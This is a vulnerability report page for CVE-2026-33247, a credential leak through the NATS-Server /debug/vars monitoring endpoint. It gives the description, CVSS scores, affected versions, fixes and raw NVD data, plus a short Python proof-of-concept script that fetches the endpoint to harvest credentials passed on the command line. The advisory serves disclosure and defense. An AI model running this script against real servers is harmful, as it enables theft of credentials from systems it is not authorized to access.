Security Vulnerability Report
中文
CVE-2026-33247 CVSS 7.4 HIGH

CVE-2026-33247

Published: 2026-03-25 20:16:33
Last Modified: 2026-03-26 17:17:08
Source: [email protected]

Description

NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, if a nats-server is run with static credentials for all clients provided via argv (the command-line), then those credentials are visible to any user who can see the monitoring port, if that too is enabled. The `/debug/vars` end-point contains an unredacted copy of argv. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, configure credentials inside a configuration file instead of via argv, and do not enable the monitoring port if using secrets in argv. Best practice remains to not expose the monitoring port to the Internet, or to untrusted network sources.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:* - VULNERABLE
NATS-Server < 2.11.15
NATS-Server >= 2.12.0, < 2.12.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target URL with the monitoring port (default is 8222) target_url = "http://<target-ip>:8222/debug/vars" try: # Send a GET request to the vulnerable endpoint response = requests.get(target_url, timeout=5) if response.status_code == 200: data = response.json() # The command line arguments (argv) are usually stored under 'cmdline' or similar keys # in the expvar output. Look for credentials in the returned data. print("[*] Response received. Parsing for credentials...") print(json.dumps(data, indent=2)) # Example check for cmdline in the output structure if 'cmdline' in data: print(f"[*] Command line arguments found: {data['cmdline']}") else: print(f"[-] Failed to retrieve data. Status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33247", "sourceIdentifier": "[email protected]", "published": "2026-03-25T20:16:33.223", "lastModified": "2026-03-26T17:17:07.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, if a nats-server is run with static credentials for all clients provided via argv (the command-line), then those credentials are visible to any user who can see the monitoring port, if that too is enabled. The `/debug/vars` end-point contains an unredacted copy of argv. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, configure credentials inside a configuration file instead of via argv, and do not enable the monitoring port if using secrets in argv. Best practice remains to not expose the monitoring port to the Internet, or to untrusted network sources."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del edge. Antes de las versiones 2.11.15 y 2.12.6, si se ejecuta un nats-server con credenciales estáticas para todos los clientes proporcionadas a través de argv (la línea de comandos), entonces esas credenciales son visibles para cualquier usuario que pueda ver el puerto de monitoreo, si este también está habilitado. El endpoint `/debug/vars` contiene una copia sin censurar de argv. Las versiones 2.11.15 y 2.12.6 contienen una corrección. Como solución alternativa, configure las credenciales dentro de un archivo de configuración en lugar de a través de argv, y no habilite el puerto de monitoreo si utiliza secretos en argv. La mejor práctica sigue siendo no exponer el puerto de monitoreo a Internet, o a fuentes de red no confiables."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-215"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-14.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-x6g4-f6q3-fqvv", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.